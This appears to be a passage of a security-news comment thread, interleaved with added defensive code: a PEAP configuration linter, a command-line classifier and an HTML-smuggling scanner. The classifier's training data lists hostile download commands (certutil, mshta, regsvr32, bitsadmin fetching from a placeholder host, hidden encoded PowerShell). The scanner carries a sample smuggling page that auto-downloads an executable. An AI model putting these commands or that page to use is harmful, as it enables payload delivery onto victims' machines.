    Cybercriminals attacked the education and research sectors most often worldwide, security company Check Point says in its assessment. In Finland, according to the company, the online scammers’ favourite sector was manufacturing, and in the Nordic countries government administration and the defence forces. Also included are Finland’s most common malware for October 2021.

    According to Check Point, globally one in 61 organisations suffers from ransomware every week. ’’That is a shocking figure and companies have to do more’’, says Sampo Vehkaoja, Check Point’s country manager for Finland and the Baltics.

    According to him, many attacks start with a simple email, so training users to recognise these threats is one of the most important countermeasures for organisations.

    In October, Finland’s most common malware was the Mailto ransomware. Globally, Trickbot holds the top spot for the fifth time. New is also a vulnerability in the Apache server software, which has quickly risen into the top 10 of the most exploited vulnerabilities.

    ”Apache HTTP Server Directory Traversal”. Apache released a patch for its software, but it was found to be insufficient. The Apache HTTP Server software still has a vulnerability whose successful exploitation can give an attacker access to files on the system.

    Reply
  27. Tomi Engdahl says:

    So. What’s Up With All These Crazy Event Networks Then?
    https://hackaday.com/2021/11/11/so-whats-up-with-all-these-crazy-event-networks-then/

    Forget the CTF, Connecting To WiFi Is The Real Challenge!

    There no doubt comes a point in every traveling hacker’s life when a small annoyance becomes a major one and a rant boils up from within, and perhaps it’s ETH0’s misfortune that it’s at their event that something has finally boiled over. I’m speaking of course about wireless networks.

    While on the road I connect to a lot of them, the normal commercial hotspots, hackerspaces, and of course at hacker camps. Connecting to a wireless network is a simple experience, with a level of security provided by WPA2 and access credentials being a password. Find the SSID, bang in the password, and you’re in. I’m as securely connected as I reasonably can be, and can get on with whatever I need to do. At hacker camps though, for some reason it never seems to be so simple.

    Instead of a simple password field you are presented with a complex dialogue with a load of fields that make little sense, and someone breezily saying “Just enter hacker and hacker!” doesn’t cut it when that simply doesn’t work. When you have to publish an app just so that attendees can hook up their phones to a network, perhaps it’s time to take another look.

    This use of WPA2 enterprise security makes sense for the security conscious administrator even if it’s annoying for the end user to configure, and as it turns out it’s the next pulldown labelled “Authentication” that’s the annoying one on my system. By default it shows “Tunnelled TLS” as its protocol, where it turns out that the hacker camp networks use “Protected EAP (PEAP)”. This is a protocol that protects the initial key exchange against a third party eavesdropping on packets and hijacking the connection.

    The Network Giveth Security, And Then Taketh It Away

    There are a few options for identity, domain, and certificate authentication servers, but the next important setting is a checkbox: “No CA certificate is required”. This is both important and infuriating, because going back to the point earlier about WPA2 Enterprise requiring a signed certificate, it appears to dispense with that entirely making the whole point of all this annoying configuration meaningless.

    So if you use a protocol that requires a certificate to authenticate the access point and then do without the certificate, where is the benefit? I am no networking guru, but as far as I can see it lies in PEAP protecting my key exchange. Since my access point isn’t authenticated using a certificate there is nothing to stop a malicious third party setting up a rogue access point and capturing my connection anyway, so that benefit seems marginal.

    I started this investigation from a standpoint of being annoyed at arcane WiFi set-ups, and assuming I understand the configuration correctly I have ended it unsure whether there is any benefit to the end user of having it in the first place. If you’re a wireless networking guru then please weigh in down in the comments, I’d really like to know.

    Meanwhile I have a suggestion. Most camps have two networks, the WPA2 Enterprise one described above, and an open “insecure” one with no encryption and sometimes precious little between client and the wider internet. Can I suggest that they also have a network running WPA2 Personal, like every Starbucks, and leave the extra configuration for the 1337? It would save *so* much confusion!

    Reply
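The “No CA certificate is required” checkbox discussed in the comment above, written out as wpa_supplicant configuration so the weak and the hardened PEAP settings can be compared side by side, together with a small linter that flags the weak one. This is an added example for this thread, not code from the Hackaday article. The keys used (key_mgmt, eap, phase2, identity, password, ca_cert, ca_path, domain_suffix_match, domain_match, subject_match) are real wpa_supplicant options; the SSID, credentials, RADIUS server name and certificate path in the two blocks are placeholders, and the linter itself is written here.

```python
"""Lint wpa_supplicant network blocks for WPA2 Enterprise (PEAP/TTLS)
settings that leave the client open to a rogue access point.

Added example, not code from the article. The network blocks are
constructed samples; SSID, credentials, server name and paths are
placeholders.
"""
import re

# Constructed sample: the "No CA certificate is required" case. Without a
# trust anchor the client accepts any RADIUS server certificate, so anyone
# running an access point with the same SSID can terminate the PEAP tunnel.
WEAK_BLOCK = """
network={
    ssid="hackercamp"
    key_mgmt=WPA-EAP
    eap=PEAP
    phase2="auth=MSCHAPV2"
    identity="hacker"
    password="hacker"
}
"""

# Constructed sample: same network, but the server certificate must chain to
# a named CA and carry the expected server name (placeholder domain).
HARDENED_BLOCK = """
network={
    ssid="hackercamp"
    key_mgmt=WPA-EAP
    eap=PEAP
    phase2="auth=MSCHAPV2"
    identity="hacker"
    password="hacker"
    ca_cert="/etc/ssl/certs/hackercamp-radius-ca.pem"
    domain_suffix_match="radius.hackercamp.example"
}
"""

# EAP methods that build a TLS tunnel to the authentication server first;
# their security rests on the client verifying that server's certificate.
TUNNELED_EAP = {"PEAP", "TTLS"}


def parse_network_block(text):
    """Return the key=value pairs of one network={...} block as a dict.
    Quotes are stripped from values; comments and blank lines are ignored."""
    m = re.search(r"network=\{(.*?)\}", text, re.S)
    if not m:
        raise ValueError("no network={...} block found")
    settings = {}
    for line in m.group(1).splitlines():
        line = line.split("#", 1)[0].strip()
        if not line or "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip()] = value.strip().strip('"')
    return settings


def lint_enterprise_block(text):
    """Return findings for a WPA-EAP block; an empty list means the server
    side of the tunnel is actually authenticated."""
    s = parse_network_block(text)
    findings = []
    if s.get("key_mgmt") != "WPA-EAP":
        return findings  # not an enterprise network, nothing to check
    eap = s.get("eap", "")
    if eap in TUNNELED_EAP:
        if not (s.get("ca_cert") or s.get("ca_path")):
            findings.append(
                "no ca_cert/ca_path: any server certificate is accepted, so a "
                "rogue access point can terminate the %s tunnel" % eap)
        if not (s.get("domain_suffix_match") or s.get("domain_match")
                or s.get("subject_match")):
            findings.append(
                "no domain_suffix_match: a certificate for any host the CA "
                "signed is accepted, not just the expected RADIUS server")
        if eap == "PEAP" and "phase2" not in s:
            findings.append("no phase2 method set for PEAP")
    return findings


if __name__ == "__main__":
    for name, block in (("weak", WEAK_BLOCK), ("hardened", HARDENED_BLOCK)):
        print(name, lint_enterprise_block(block) or ["ok"])
```

The two findings on the weak block are the answer to the question raised in the comment: PEAP still encrypts the inner credential exchange, but with no CA pinned the client will happily build that tunnel to whoever answers, which is why the benefit looks marginal. Adding ca_cert alone is not enough either; without a domain match any certificate from that CA, including one issued for an unrelated server, still passes.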
  28. Tomi Engdahl says:

    Campbell Kwan / ZDNet:
    Biden signs the Secure Equipment Act of 2021, denying FCC licenses to national security threats, effectively banning Huawei and ZTE network equipment in the US — The Secure Equipment Act of 2021 received bipartisan support prior to it being signed by Biden.

    US President Biden signs law to ban Huawei and ZTE from receiving FCC licences
    The Secure Equipment Act of 2021 received bipartisan support prior to it being signed by Biden.
    https://www.zdnet.com/article/us-president-biden-signs-law-to-ban-huawei-and-zte-from-receiving-fcc-licences/

    US President Joe Biden on Thursday signed into law bipartisan legislation that will ban companies like Huawei and ZTE from getting approval for network equipment licences in the US.

    The legislation, Secure Equipment Act of 2021, will require the Federal Communications Commission (FCC) to adopt new rules that clarify it will no longer review or approve any authorisation applications for networking equipment that pose national security threats.

    Last year, the FCC formally designated Huawei and ZTE as national security threats, with that decision being made as the agency found that both companies had close ties to the Chinese Communist Party and China’s military apparatus.

    Since March, FCC commissioner Brendan Carr has made repeated calls for the legislation to be passed, saying at the time that the FCC has authorised 3,000 applications for Huawei networking equipment to be used.

    “Once we have determined that Huawei or other gear poses an unacceptable national security risk, it makes no sense to allow that exact same equipment to be purchased and inserted into our communications networks as long as federal dollars are not involved. The presence of these insecure devices in our networks is the threat, not the source of funding used to purchase them,” Carr said at the time.

    Reply
  29. Tomi Engdahl says:

    EU now demands more from the cyber security of devices
    https://etn.fi/index.php?option=com_content&view=article&id=12770&via=n&datum=2021-11-01_16:17:04&mottagare=31202

    The European Commission has issued a new regulation according to which manufacturers must ensure the security of wireless devices before they can be sold on the EU market. The new regulation under the Radio Equipment Directive establishes new legal requirements for cybersecurity safeguards that manufacturers must take into account in the design and production of products.

    According to Commissioner Margrethe Vestager, who is responsible for the Union’s digital readiness and presented the regulation, our connected devices must be secure. “How else could we use them with confidence for professional or personal communication,” Vestager asks.

    For device manufacturers the new regulation brings more responsibilities and work. For example, smartphones must include features that avoid interference with communication networks and prevent the devices from being used to disrupt the operation of websites or other services.

    Reply
  30. Tomi Engdahl says:

    Cyber security of wireless devices to be strengthened
    https://www.uusiteknologia.fi/2021/11/02/langattomien-kyberturvaa-halutaan-vahvistaa/

    The European Commission wants to improve the cyber security of wireless devices. A new regulation linked to the Radio Equipment Directive aims to ensure the security of wireless devices before they can be sold in the European Union. After the regulation is adopted there will still be a transition period lasting until summer 2024 and new standards for manufacturing.

    Commission strengthens cybersecurity of wireless devices and products
    https://ec.europa.eu/commission/presscorner/detail/fi/ip_21_5634

    The Commission has taken action to improve the cybersecurity of wireless devices on the European market. Mobile phones, smart watches, fitness trackers and smart toys are an ever more integral part of people’s daily lives. With that, the risk of cyber threats faced by consumers also grows. The delegated act to the Radio Equipment Directive adopted today aims to ensure the security of wireless devices before they can be sold on the EU market. The act establishes new legal requirements for cybersecurity safeguards that manufacturers must take into account in the design and production of products. It will also protect citizens’ privacy and personal data, reduce the risk of financial fraud and improve the resilience of communication networks.

    Reply
  31. Tomi Engdahl says:

    New help for the cyber security of artificial intelligence
    https://www.uusiteknologia.fi/2021/11/03/uutta-apua-tekoalyn-kyberturvallisuuteen/

    The National Cyber Security Centre of the Finnish Transport and Communications Agency Traficom has developed a new tool for managing the cyber security risks of artificial intelligence. It is supported by a new AI study, Finland’s first made from the perspective of cyber security and risk management.

    Cyber security and risk management in the application of artificial intelligence
    https://www.traficom.fi/sites/default/files/media/publication/Teko%C3%A4lyn%20soveltamisen%20kyberturvallisuus%20ja%20riskienhallinta.pdf

    Reply
  32. Tomi Engdahl says:

    EU to adopt new cybersecurity rules for smartphones, wireless, IoT devices
    https://therecord.media/eu-to-adopt-new-cybersecurity-rules-for-smartphones-wireless-iot-devices/

    The European Commission has ordered an update to the Radio Equipment Directive in order to introduce new cybersecurity guidelines for radio and wireless equipment sold on the EU market, such as mobile phones, tablets, fitness trackers, and other smart IoT devices.

    The new standards, which are currently scheduled to enter into effect by mid-2024, were adopted following a delegated act to the Radio Equipment Directive (RED), a piece of 2014 EU legislation that acts as the regulatory framework that equipment vendors must follow in order to sell electronic equipment on the EU market.

    The delegated act, which is a bureaucratic mechanism used by the European Commission to tell EU bodies to update legislation, lists three new security measures that device makers must incorporate in the design of their products in order to be allowed to sell products in the EU. These include:

    Improve network resilience: Wireless devices and products will have to incorporate features to avoid harming communication networks and prevent the possibility that the devices are used to disrupt website or other services functionality.
    Better protect consumers’ privacy: Wireless devices and products will need to have features to guarantee the protection of personal data. The protection of children’s rights will become an essential element of this legislation. For instance, manufacturers will have to implement new measures to prevent unauthorised access or transmission of personal data.
    Reduce the risk of monetary fraud: Wireless devices and products will have to include features to minimise the risk of fraud when making electronic payments. For example, they will need to ensure better authentication control of the user in order to avoid fraudulent payments.

    Reply
  33. Tomi Engdahl says:

    To Joke or Not to Joke: COVID-22 Brings Disaster to MBR https://www.fortinet.com/blog/threat-research/to-joke-or-not-to-joke-covid-22-brings-disaster-to-mbr
    Even now, almost two years after the COVID-19 pandemic started, there is no sign that cybercriminals will stop taking advantage of the situation as an attack vector. This time, however, this attacker uses a COVID pandemic that has not yet happened as bait. FortiGuard Labs recently discovered a new malware posing as a mysterious COVID22 installer. While containing many of the features of “joke” malware, it is also destructive, causing infected machines to fail to boot.
    Because it has no features for encrypting data demanding a ransom to undo the damage it inflicts, it is instead a new destructive malware variant designed to render affected systems inoperable. This blog explains how this malware works.

    Reply
  34. Tomi Engdahl says:

    Golang Malware Is More than a Fad: Financial Motivation Drives Adoption https://www.crowdstrike.com/blog/financial-motivation-drives-golang-malware-adoption/
    CrowdStrike researchers uncovered an 80% increase in Golang (Go)-written malware samples from June to August 2021, according to CrowdStrike threat telemetry. In terms of malware type, first place goes to coin miners, accounting for 70% of the malware spectrum in August 2021.

    Reply
  35. Tomi Engdahl says:

    Living off the Land (LotL) Classifier Open-Source Project
    https://medium.com/adobetech/living-off-the-land-lotl-classifier-open-source-project-b167484c8187
    In security, “Living off the Land” (LotL or LOTL)-type attacks are not new. Bad actors have been using legitimate software and functions to target systems and carry out malicious attacks for many years. And although it’s not novel, LotL is still one of the preferred approaches even for highly skilled attackers. Why? Because hackers tend not to reinvent the wheel and prefer to keep a low profile, i.e., leave no “footprints,” such as random binaries or scripts on the system. Interestingly, these stealthy moves are exactly why it’s often very difficult to determine which of these actions are a valid system administrator and which are an attacker. It’s also why static rules can trigger so many false positives and why compromises can go undetected.
    Most antivirus vendors do not treat executed commands (from a syntax and vocabulary perspective) as an attack vector, and most of the log-based alerts are static, limited in scope, and hard to update. Furthermore, classic LotL detection mechanisms are noisy and somewhat unreliable, generating a high number of false positives, and because typical rules grow organically, it becomes easier to retire and rewrite the rules rather than maintain and update them.
    The security intelligence team at Adobe set out to help fix this problem. Using open source and other representative incident data, we developed a dynamic and high-confidence program, called LotL Classifier, and then we open sourced it to the broader community.
    The LotL Classifier is unique because it uses a supervised learning approach — this means it maps an input to an output based on example input-output pairs.
    https://github.com/adobe/libLOL

    Reply
  36. Tomi Engdahl says:

    Google, Adobe Announce New Open Source Security Tools
    https://www.securityweek.com/google-adobe-announce-new-open-source-security-tools

    Google and Adobe this week announced the availability of new open source security tools, for continuous fuzzing and detecting living-off-the-land attacks.

    Google releases ClusterFuzzLite

    Google announced the open source release of ClusterFuzzLite, which it described as a ClusterFuzz-based continuous fuzzing solution that runs as part of continuous integration (CI) workflows in an effort to help users find vulnerabilities before they are committed to the source code.

    ClusterFuzzLite can be integrated into CI workflows with only a few lines of code.
    https://github.com/google/clusterfuzzlite

    Adobe releases LotL Classifier

    Living-off-the-land (LotL) is used to describe attacks where malicious actors leverage legitimate software in an effort to avoid being detected.

    Adobe has released an open source tool, named LotL Classifier, that is designed to detect LotL attacks by leveraging a “feature extraction” component and a machine learning-based classifier algorithm.
    https://github.com/adobe/libLOL
    https://www.securityweek.com/extensive-living-land-hides-stealthy-malware-campaign

    Reply
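The supervised approach described in the two LotL Classifier comments above (feature extraction from a command line, then a learner fitted on labelled input/output pairs), shown end to end. This is an added example for this thread, not Adobe’s libLOL code: the learner is a hand-rolled Bernoulli naive Bayes so it runs without scikit-learn, the feature set is a minimal stand-in for libLOL’s feature extractor, and every command line in the training set (hosts in the 203.0.113.0/24 documentation range, paths, the base64 blob) is constructed.

```python
"""Command-line classification as supervised learning: extract features
from each command line, fit on labelled examples, predict on new lines.

Added example, not Adobe's libLOL. Training data is constructed.
"""
import math
import re
from collections import Counter, defaultdict

URL_RE = re.compile(r"https?://\S+", re.I)
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def extract_features(cmdline):
    """Bag of features: executable basename, each switch, and structural
    tags (URL in the arguments, long base64 token, very long line)."""
    tokens = cmdline.strip().split()
    if not tokens:
        return []
    exe = tokens[0].replace("\\", "/").rsplit("/", 1)[-1].lower()
    feats = ["exe:" + exe]
    for t in tokens[1:]:
        if t[:1] in "-/":
            feats.append("flag:" + t.lower().split(":", 1)[0])
    if URL_RE.search(cmdline):
        feats.append("tag:url")
    if B64_RE.search(cmdline):
        feats.append("tag:long_b64")
    if len(cmdline) > 200:
        feats.append("tag:long")
    return feats


class BernoulliNB:
    """Binary-feature naive Bayes with Laplace smoothing."""

    def __init__(self):
        self.doc_count = Counter()          # label -> number of samples
        self.feat_count = defaultdict(Counter)  # label -> feature -> docs containing it
        self.vocab = set()

    def fit(self, samples):
        for cmd, label in samples:
            self.doc_count[label] += 1
            for f in set(extract_features(cmd)):
                self.feat_count[label][f] += 1
                self.vocab.add(f)
        return self

    def log_scores(self, cmd):
        """Log posterior (up to a constant) for each label; absent features
        count too, which is what makes this the Bernoulli variant."""
        present = set(extract_features(cmd))
        total = sum(self.doc_count.values())
        scores = {}
        for label, n in self.doc_count.items():
            lp = math.log(n / total)
            for f in self.vocab:
                p = (self.feat_count[label][f] + 1) / (n + 2)
                lp += math.log(p if f in present else 1 - p)
            scores[label] = lp
        return scores

    def predict(self, cmd):
        scores = self.log_scores(cmd)
        return max(scores, key=scores.get)


# Constructed labelled samples: routine administration versus the same
# signed binaries fetching or decoding content from outside the host.
TRAINING = [
    (r"powershell.exe Get-Service -Name Spooler", "benign"),
    (r"certutil.exe -hashfile C:\Windows\notepad.exe SHA256", "benign"),
    (r'regsvr32.exe /s "C:\Program Files\App\component.dll"', "benign"),
    (r"net.exe use Z: \\fileserver\share /persistent:yes", "benign"),
    (r"bitsadmin.exe /list /allusers", "benign"),
    (r"powershell.exe -File C:\Scripts\nightly-backup.ps1", "benign"),
    (r"wmic.exe os get version", "benign"),
    ("powershell.exe -nop -w hidden -enc " + "QUFB" * 12, "suspicious"),
    (r"certutil.exe -urlcache -split -f http://203.0.113.7/x.txt C:\Users\Public\x.txt", "suspicious"),
    (r"mshta.exe http://203.0.113.7/x.hta", "suspicious"),
    (r"regsvr32.exe /s /n /u /i:http://203.0.113.7/x.sct scrobj.dll", "suspicious"),
    (r"bitsadmin.exe /transfer job http://203.0.113.7/x.txt C:\Users\Public\x.txt", "suspicious"),
    (r"powershell.exe -w hidden -ep bypass -File C:\Users\Public\x.ps1", "suspicious"),
]


def train_default():
    """Classifier fitted on the constructed training set."""
    return BernoulliNB().fit(TRAINING)


if __name__ == "__main__":
    clf = train_default()
    for cmd in (r"certutil.exe -urlcache -f http://203.0.113.9/y.txt y.txt",
                r"certutil.exe -hashfile C:\Temp\report.pdf MD5"):
        print(clf.predict(cmd), "<-", cmd)
```

The point the comment makes about static rules shows up directly in the features: the same executable (certutil, regsvr32, powershell) appears on both sides of the training set, so a rule keyed on the binary name alone would either miss everything or fire on every administrator. What separates the two classes here is the combination of switches and structural tags, which is what the learner weighs and what a maintained rule set struggles to keep encoding by hand.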
  37. Tomi Engdahl says:

    Aisha Counts / Protocol:
    Report finds that online child sexual abuse material is increasing in sheer volume, growing more complex, and capitalizing on tech’s blind spots

    Child sexual abuse is exploding online. Tech’s best defenses are no match.
    https://www.protocol.com/policy/csam-child-safety-online

    A new report argues there’s more tech companies can do to stop child sexual abuse material from spreading online without sacrificing privacy.

    Reply
  38. Tomi Engdahl says:

    China’s cyber watchdog unveils new draft data management regulations https://therecord.media/chinaa-cyber-watchdog-unveils-new-draft-data-management-regulations/
    The Cyberspace Administration of China, the nation’s cybersecurity watchdog, issued a set of draft regulations on Sunday aimed at protecting the nation’s internet data security.

    Reply
  39. Tomi Engdahl says:

    Researchers Demonstrate New Fingerprinting Attack on Tor Encrypted Traffic https://thehackernews.com/2021/11/researchers-demonstrate-new.html
    A new analysis of website fingerprinting (WF) attacks aimed at the Tor web browser has revealed that it’s possible for an adversary to glean a website frequented by a victim, but only in scenarios where the threat actor is interested in a specific subset of the websites visited by users.

    Reply
  40. Tomi Engdahl says:

    Exchange Exploit Leads to Domain Wide Ransomware
    https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/
    We observed an intrusion where an adversary exploited multiple Exchange vulnerabilities (ProxyShell) to drop multiple web shells.
    Over the course of three days, three different web shells were dropped in publicly accessible directories. These web shells, exposed to the internet, were used to execute arbitrary code on the Microsoft Exchange Server utilizing PowerShell and cmd.

    Reply
  41. Tomi Engdahl says:

    Four Things Your CISO Wants Your Board to Know
    https://www.securityweek.com/four-things-your-ciso-wants-your-board-know

    In Order to Adequately Protect an Organization, Your Cybersecurity Budget Should be More Than 1% of Your Overall IT Spend

    It’s been said time and time again: when it comes to cybersecurity, don’t skimp. Global IT spending has risen over the years to keep pace with today’s threats. ISG Research said earlier this summer that cybersecurity spending has nearly doubled year-over-year. As a percentage of total IT spending, it accounted for 4.7 percent in 2020, compared to 2.5 percent in 2019. Organizations should be spending at least that much to ensure they’re prepared to combat the threats of tomorrow.

    It’s Impossible to Provide Metrics on how Many Advanced Persistent Threats You’ve Blocked in the Past Month

    I’ve stressed this for years. One of the most misleading metrics in cybersecurity remains the number of threats your organization has blocked. Sure, it sounds great in theory to say you’ve blocked x number of threats across your perimeter and endpoints, but sometimes metrics can fail to reflect the hard work your team is doing day in, day out.

    Focus on metrics that build trust instead of causing confusion. Consider providing details including:
    • Cyber threat dwell time – how long was an adversary in your system before you discovered them?
    • Patching and vulnerability metrics – how long did it take for your team to fix an issue or roll out a patch for a vulnerability?
    • For high-risk items, what’s the mean time to closure?
    • How many incidents did your team identify and remedy?
    • And if you’ve recently integrated a new security solution or introduced a cybersecurity initiative – like rolling out multi-factor authentication or a phishing awareness exercise – what was the result?

    Building a Culture of Cybersecurity as a Top-down Strategy is Imperative

    Sure, getting and maintaining executive buy-in is important but cybersecurity is a team effort. CISOs need to build a culture where all team members understand the importance of your program and their role in cybersecurity. It’s everyone’s responsibility to keep an organization safe. Like any other companywide effort, this can be effective when the messaging comes from the top.

    Align Your Cybersecurity Strategy to an Acceptable Framework that Demonstrates Maturity Over Time

    Just because an organization hires a CISO doesn’t mean it’s secure on day one. Cybersecurity needs nurturing; it can take time to build and develop a robust program.
    One of the first steps is ensuring the board understands where the organization is today in terms of control maturity. From there, you can develop a plan to achieve higher levels of maturity over time.

    Reply
  42. Tomi Engdahl says:

    Microsoft Says HTML Smuggling Attacks On The Rise
    https://www.securityweek.com/microsoft-says-html-smuggling-attacks-rise

    Microsoft says it has observed an increase in the use of HTML smuggling in malicious attacks distributing remote access Trojans (RATs), banking malware, and other malicious payloads.

    HTML smuggling leverages HTML5/JavaScript for the download of files onto a victim machine, which in the case of these attacks is an encoded malicious script designed to assemble the final payload directly on the victim computer.

    Phishing emails are used to either deliver specially crafted HTML attachments or to direct the intended victim to a malicious web page designed to smuggle the script.

    Microsoft said it observed the Chinese threat actor NOBELIUM leveraging the technique in a series of attacks in May, and is now seeing the same method being used to deliver AsyncRAT/NJRAT, Trickbot, and the banking Trojan Mekotio.

    Because the malicious payload is built behind the firewall, the technique allows adversaries to easily bypass standard perimeter security controls that check network traffic for suspicious attachments or patterns.

    “Because the malicious files are created only after the HTML file is loaded on the endpoint through the browser, what some protection solutions only see at the onset are benign HTML and JavaScript traffic, which can also be obfuscated to further hide their true purpose,” Microsoft said.

    Reply
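A content check a mail gateway or endpoint agent can run on an HTML attachment, targeting the chain the comment above describes (a base64 blob decoded in the browser and handed over as a file download). This is an added example for this thread, not Microsoft’s detection logic. Both HTML documents in it are constructed samples: a newsletter with an inline base64 image that must not trip the check, and a page with the indicator chain whose “payload” is just the bytes MZ followed by zeros.

```python
"""Heuristic scan of an HTML document for HTML smuggling indicators.

Added example, not Microsoft's code. Sample documents are constructed;
the embedded "payload" is inert (MZ followed by zero bytes).
"""
import base64
import binascii
import re

# JavaScript APIs that, chained together, turn data inside the page into a
# file on disk without any download crossing the perimeter as a file.
INDICATORS = {
    "atob": re.compile(r"\batob\s*\("),
    "blob": re.compile(r"new\s+Blob\s*\("),
    "object_url": re.compile(r"createObjectURL\s*\(|msSaveOrOpenBlob\s*\("),
    "download_attr": re.compile(r"\.download\s*=|\bdownload\s*=\s*[\"']"),
    "auto_click": re.compile(r"\.click\s*\(\s*\)"),
}
# Quoted base64 literals long enough to carry content rather than a token.
# A data: URI does not match because its prefix is not base64.
B64_LITERAL = re.compile(r"[\"']([A-Za-z0-9+/]{64,}={0,2})[\"']")
# Magic bytes worth reporting when found inside a decoded literal.
MAGIC = {b"MZ": "pe", b"PK\x03\x04": "zip", b"%PDF": "pdf"}


def decoded_magic(html):
    """Decode every long base64 literal and report recognised file magic.
    This second signal survives renaming of the JavaScript identifiers."""
    found = []
    for lit in B64_LITERAL.findall(html):
        try:
            raw = base64.b64decode(lit, validate=True)
        except (binascii.Error, ValueError):
            continue
        for sig, name in MAGIC.items():
            if raw.startswith(sig):
                found.append(name)
    return found


def scan_html(html):
    """Return the indicators that fired, any decoded magic, and a verdict.
    'smuggling' requires the decode-to-file chain, not a single API hit."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(html)]
    magic = decoded_magic(html)
    present = set(hits)
    chain = ({"atob", "blob", "object_url"} <= present
             or ({"atob", "blob"} <= present and "download_attr" in present))
    verdict = "smuggling" if chain or (magic and "atob" in present) else "clean"
    return {"indicators": hits, "decoded_magic": magic, "verdict": verdict}


# Constructed benign sample: inline image as a data: URI plus harmless script.
BENIGN_HTML = """<html><body><h1>Newsletter</h1>
<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg==">
<script>document.title = "Newsletter " + new Date().getFullYear();</script>
</body></html>"""

# Constructed smuggling-style sample; the literal decodes to MZ + zeros.
FAKE_PAYLOAD_B64 = base64.b64encode(b"MZ" + b"\x00" * 62).decode()
SMUGGLING_HTML = """<html><body><p>Your document is being prepared.</p>
<script>
var data = atob("__PAYLOAD__");
var blob = new Blob([data], {type: "application/octet-stream"});
var a = document.createElement("a");
a.href = URL.createObjectURL(blob);
a.download = "invoice.exe";
a.click();
</script></body></html>""".replace("__PAYLOAD__", FAKE_PAYLOAD_B64)


if __name__ == "__main__":
    for name, doc in (("benign", BENIGN_HTML), ("sample", SMUGGLING_HTML)):
        print(name, scan_html(doc))
```

The verdict deliberately needs the whole chain rather than one API, since atob or Blob alone are common in legitimate pages. The decoded-magic check is there because of the obfuscation point in Microsoft’s quote: renamed or split identifiers defeat the regexes, but the embedded data still has to decode to something the browser can save, and checking what it decodes to does not depend on how the script is written.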
  43. Tomi Engdahl says:

    Martin Matishak / The Record:
    DHS issues an interim rule that will, once finalized, let it hire cybersecurity professionals at salaries of up to $255,800 and up to $332,100 in special cases

    DHS launches new effort to attract cybersecurity talent
    https://therecord.media/dhs-launches-new-effort-to-attract-cybersecurity-talent/

    Reply
  44. Tomi Engdahl says:

    Daniel Flatley / Bloomberg:
    The US and Israel partner to fight ransomware attacks and threats to the global financial system

    https://www.bloomberg.com/news/articles/2021-11-14/u-s-israel-join-forces-to-combat-ransomware-attacks

    Reply
